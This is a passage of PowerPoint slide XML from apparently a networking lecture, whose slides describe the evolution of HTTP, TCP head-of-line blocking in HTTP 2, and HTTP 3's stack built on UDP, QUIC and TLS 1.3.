      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="Elbow Connector 22"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="11" idx="1"/>
            <a:endCxn id="10" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="1703069" y="4098685"/>
            <a:ext cx="861176" cy="745643"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">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729268" y="4861351"/>
            <a:ext cx="1120841" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="5715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479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C161-C3E5-C19A-B8B2-CD2FDA7C2B0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP Over Time</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B574D815-5983-D4A1-1B2D-D2EA81DBC072}"/>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90</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58A509F9-999D-A594-C855-EDA1EF028A0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="203200" y="1600200"/>
          <a:ext cx="11785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52F776E8-85BE-6D57-A250-52C36AA260DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9712800" y="2262900"/>
            <a:ext cx="1814400" cy="37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92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3E93-EE88-BDEA-B349-708928C35E08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Problems With HTTP 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5A497D7-FC14-9B3B-9D5E-CD98A855B13D}"/>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91</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2DE8473-EE01-9352-C69C-E238B3E4FD85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Head-of-line blocking at the TCP-level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A single packet drop stops all HTTP 2 streams on the socket, not just the one stream that lost a packet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Redundancy with TCP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stream abstraction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Flow control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36686272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876B7-4685-A2ED-C910-5340A750658C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rebuilding HTTP from Layer 4 up</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F776D2B1-DDBD-575A-9268-14D2CFE24258}"/>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92</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91F42343-C7E0-7090-91F1-FF6064236DE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP 3 is built on a custom protocol stack, starting at layer 4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UDP for ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>QUIC for multiple reliable, in order byte streams in parallel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tight integration with TLS 1.3 for encrypted packets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Retains the innovations of HTTP 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Binary, compressed HTTP headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Multiple, parallel requests (via QUIC streams)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server push</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All of the performance improvements of HTTP 3 are due to QUIC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5304204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EF8A7-851D-8789-807A-7AE03DD80D45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Layer Diagrams</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{240D7A14-4457-202A-12D7-24355DCD6846}"/>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93</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="22" name="Group 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{549EE37E-2AA2-8EFC-AAEA-6F69CF05ADB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="424800" y="3679330"/>
            <a:ext cx="2287200" cy="1922400"/>
            <a:chOff x="424800" y="3679330"/>
            <a:chExt cx="2287200" cy="1922400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Rectangle 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63A08D19-93BF-6BF7-A7AF-4F7D3F493EA0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="424800" y="3679330"/>
              <a:ext cx="2287200" cy="640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HTTP 1.0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Rectangle 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FA3AEB0-D693-F5AE-7F0D-AD1920377E2B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="424800" y="4320130"/>
              <a:ext cx="2287200" cy="6408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t>TCP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Rectangle 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00DEFE57-4CEA-33D3-03E7-295A10376108}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="424800" y="4960930"/>
              <a:ext cx="2287200" cy="6408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dirty="0"/>
                <a:t>IP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="23" name="Group 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47F9A433-269D-B31A-F766-08F3F25BA146}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3423200" y="3038530"/>
            <a:ext cx="2287200" cy="2563200"/>
            <a:chOff x="3195171" y="3038530"/>
            <a:chExt cx="2287200" cy="2563200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Rectangle 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA8CE660-AD3B-FB62-5B17-F8ABFD9403DC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3195171" y="3038530"/>
              <a:ext cx="2287200" cy="640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HTTP 1.1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Rectangle 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB12917C-11C6-260E-C487-FBCD9B428411}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3195171" y="4320130"/>
              <a:ext cx="2287200" cy="6408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t>TCP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Rectangle 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA9C2D72-8FD6-8849-53D0-658B14A46AE0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3195171" y="4960930"/>
              <a:ext cx="2287200" cy="6408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dirty="0"/>
                <a:t>IP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Rectangle 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6ECDB1E-CA5A-0655-D76F-EDC64A98053C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3195171" y="3679330"/>
              <a:ext cx="2287200" cy="640800"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:pattFill prst="pct90">
              <a:fgClr>
                <a:schemeClr val="accent5"/>
              </a:fgClr>
              <a:bgClr>
                <a:schemeClr val="bg1"/>
              </a:bgClr>
            </a:patt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800" dirty="0"/>
                <a:t>SSL/TLS (opt.)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="25" name="Group 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9249490-8034-460C-8986-FF41EBA6BD81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9420000" y="2390660"/>
            <a:ext cx="2287200" cy="3211070"/>
            <a:chOff x="9420000" y="2390660"/>
            <a:chExt cx="2287200" cy="3211070"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Rectangle 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25A8C6C3-F43F-8550-8F65-045A4E67B447}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9420000" y="2390660"/>
              <a:ext cx="2287200" cy="640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HTTP 3</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Rectangle 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD6549CC-C8BB-231B-66DC-B701BBCD2577}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9420000" y="4320130"/>
              <a:ext cx="2287200" cy="640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dirty="0"/>
                <a:t>UDP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Rectangle 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{378E8706-2B7A-DAF5-29FF-CED0BA2D3AC9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9420000" y="4960930"/>
              <a:ext cx="2287200" cy="6408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dirty="0"/>
                <a:t>IP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Rectangle 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A212407E-FF40-7FBB-2F77-E122000077FF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9420000" y="3038530"/>
              <a:ext cx="2287200" cy="12816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800" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Rectangle 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3456866E-EF41-095A-4E5E-3875A06B4C12}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9903171" y="3209465"/>
              <a:ext cx="1320858" cy="43907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800" dirty="0"/>
                <a:t>TLS 1.3</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="TextBox 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59BF637A-5A5B-0A4A-FA88-05DEB0C73321}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10028400" y="3732377"/>
              <a:ext cx="1117925" cy="523220"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>QUIC</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="24" name="Group 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFFC9518-E8AF-5F3B-B10A-FA111A6BF0A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6421600" y="3038530"/>
            <a:ext cx="2287200" cy="2563200"/>
            <a:chOff x="6168171" y="3038530"/>
            <a:chExt cx="2287200" cy="2563200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Rectangle 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F505DC58-5016-6D63-0C89-A754540C2C89}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6168171" y="3038530"/>
              <a:ext cx="2287200" cy="640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HTTP 2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Rectangle 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8EFB163-4F0A-B9C3-FFC5-6777C6B024B3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6168171" y="4320130"/>
              <a:ext cx="2287200" cy="6408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t>TCP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Rectangle 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D7ED4E6-0AAB-CBA7-60C7-23FE0DE4839D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6168171" y="4960930"/>
              <a:ext cx="2287200" cy="6408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dirty="0"/>
                <a:t>IP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="Rectangle 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFBE7A4A-8DDD-D2F8-5703-84DA48C7DA0A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6168171" y="3679330"/>
              <a:ext cx="2287200" cy="640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800" dirty="0"/>
                <a:t>TLS 1.2+</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31253263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FDAA-284F-6671-CE10-7E22BECB4F28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Streams in QUIC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{647E23F5-852D-BB1D-4271-2B0B57F218EC}"/>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94</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D76881E9-4F8D-549B-E1EA-6CB9843ACBF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>QUIC supports multiple, in parallel streams over a single UDP socket</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Like HTTP 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46FF4EB2-9A1C-695F-F62A-A0FFEF9101A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1425600" y="2465704"/>
            <a:ext cx="9122400" cy="4028696"/>
            <a:chOff x="1425600" y="754298"/>
            <a:chExt cx="9122400" cy="5200102"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Rectangle 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13EC682F-35CE-A2FA-3D89-8C74A453CAF3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1425600" y="1296000"/>
              <a:ext cx="9122400" cy="46584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628D8FA-A07D-136B-BFAC-7A57E70F758C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5244449" y="754298"/>
              <a:ext cx="1484702" cy="516448"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
